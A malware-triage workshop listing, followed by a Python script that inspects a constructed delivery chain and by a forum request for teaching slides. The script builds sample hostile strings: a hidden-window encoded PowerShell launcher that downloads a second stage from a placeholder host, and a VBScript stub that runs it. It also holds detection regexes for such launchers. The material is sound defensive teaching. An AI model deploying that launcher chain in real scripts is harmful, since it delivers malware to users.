Workshop Information: Malware Triage - Analyzing The Modern Malware Delivery Chain


Title: Malware Triage - Analyzing The Modern Malware Delivery Chain

Instructors: Sergei Frankoff & Sean Wilson

Abstract: Malspam with an attached malicious document has become the standard delivery vector for most criminal malware. To evade detection, it is common for these malicious documents to execute a long chain of scripts involving macros, JavaScript, and PowerShell before downloading the final payload. As a result, incident responders and malware analysts need to be comfortable analyzing different document formats and script languages to make sense of these delivery chains.

In this workshop you will work through the triage of a live malware delivery chain that includes a malicious document, malicious scripts, and a final malware payload. Along the way you will be exposed to different document formats and malscripts while practicing the skills required to manually analyze these delivery chains. The workshop focuses on the fundamental analysis techniques used when identifying, deobfuscating, and analyzing maldocs and malscripts; it also introduces some free and open source tools that can speed up the analysis process.

This workshop is aimed at junior incident responders, hobby malware analysts, and general security or IT practitioners who want to learn more about the malware triage process. If you have no experience with malware analysis but have a good understanding of scripting languages like VBScript and JavaScript, and you are familiar with Windows internals, you should have no problem completing the workshop.

You will be provided with a virtual machine to use during the workshop. Please make sure to bring a laptop that meets the following requirements: VirtualBox or VMware must be installed and working prior to the start of the course; the laptop must have at least 60GB of disk space free, preferably 100GB; and it must be able to mount USB storage devices (bring the appropriate dongle if you need one).

Level: Beginner

Prerequisites: None

Required Materials: Students will be provided with a virtual machine to use during the workshop. They will need to bring a laptop that meets the following requirements:

- The laptop must have VirtualBox or VMware installed and working prior to class.
- The laptop must have at least 60GB of disk space free, preferably 100GB.
- The laptop must be able to mount USB storage devices (ensure you have the appropriate dongle if you need one).
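
As an added illustration of the kind of triage the abstract describes (this is not workshop material and not code from the instructors), the Python script below walks the three stages of a delivery chain on constructed samples: it checks whether an OOXML document carries a VBA project part, flags launcher indicators in a VBScript stub, and recovers the script hidden behind a PowerShell `-EncodedCommand` launcher so the downloader stage becomes visible. The sample document, VBScript text, command line and the `example.invalid` URL are all constructed inline, and the indicator regexes are illustrative, not a complete ruleset.

```python
"""Delivery-chain triage helpers (added example, not workshop material).

Walks the three stages named in the abstract on constructed samples:
  1. maldoc     - does the OOXML container carry a VBA project part?
  2. VBScript   - does the dropped script look like a launcher?
  3. PowerShell - recover and inspect the script behind -EncodedCommand.
"""
import base64
import io
import re
import zipfile
from typing import Dict, List, Optional

# OOXML documents are zip containers; a Word VBA project lives in this part.
VBA_PART = "word/vbaProject.bin"

# Illustrative indicators per script stage (label, regex); not a full ruleset.
SCRIPT_INDICATORS = {
    "vbscript": [
        ("shell-object", r'(?i)CreateObject\(\s*"WScript\.Shell"'),
        ("http-client", r"(?i)MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest"),
    ],
    "powershell": [
        ("encoded-command", r"(?i)-(?:enc|encodedcommand)\b"),
        ("hidden-window", r"(?i)-(?:w|windowstyle)\s+hidden"),
        ("downloader", r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"),
    ],
}


def build_sample_docx(with_macro: bool) -> bytes:
    """Construct a minimal OOXML container in memory (sample input only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr(VBA_PART, b"\xd0\xcf\x11\xe0")  # OLE magic only, no real VBA
    return buf.getvalue()


def has_vba_project(doc_bytes: bytes) -> bool:
    """Stage 1: report whether the document carries a VBA project part."""
    try:
        with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
            return VBA_PART in z.namelist()
    except zipfile.BadZipFile:
        return False  # not an OOXML container (e.g. legacy OLE2 .doc or junk)


def script_indicators(kind: str, text: str) -> List[str]:
    """Return the labels of every indicator that matches the script text."""
    return [label for label, pattern in SCRIPT_INDICATORS[kind] if re.search(pattern, text)]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Stage 3: recover the script behind powershell -EncodedCommand.

    PowerShell expects the argument to be base64 over UTF-16LE text.
    """
    m = re.search(r"(?i)-(?:enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_chain(doc_bytes: bytes, vbs_text: str, ps_cmdline: str) -> Dict[str, object]:
    """Run all three stages and collect one report for the chain."""
    ps_labels = script_indicators("powershell", ps_cmdline)
    report: Dict[str, object] = {
        "maldoc_has_macro": has_vba_project(doc_bytes),
        "vbscript": script_indicators("vbscript", vbs_text),
        "powershell": ps_labels,
    }
    decoded = decode_encoded_command(ps_cmdline)
    if decoded is not None:
        # Indicators that only show up once the encoded layer is peeled off.
        ps_labels.extend("decoded:" + lbl for lbl in script_indicators("powershell", decoded))
        report["decoded_script"] = decoded
    return report


# --- Constructed samples (not real malware) --------------------------------
STAGE2_SCRIPT = "(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_PS_CMDLINE = "powershell.exe -w hidden -enc " + base64.b64encode(
    STAGE2_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_VBS = 'Set sh = CreateObject("WScript.Shell")\nsh.Run "' + SAMPLE_PS_CMDLINE + '", 0'

if __name__ == "__main__":
    for key, value in triage_chain(build_sample_docx(True), SAMPLE_VBS, SAMPLE_PS_CMDLINE).items():
        print(f"{key}: {value}")
```

The point of the last stage is the one the abstract makes: indicators such as the download call are invisible on the process command line and only appear after the encoded layer is decoded, which is why triage has to follow the chain rather than stop at the first script.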

#2

Hello, I'm trying to create a SlideShare for students to explain the analysis tools for Modern Malware Distribution Systems for my project in the course of lectures. Where can I find the drive-by download attack scenario and screenshots of social engineering tactics? Thanks.
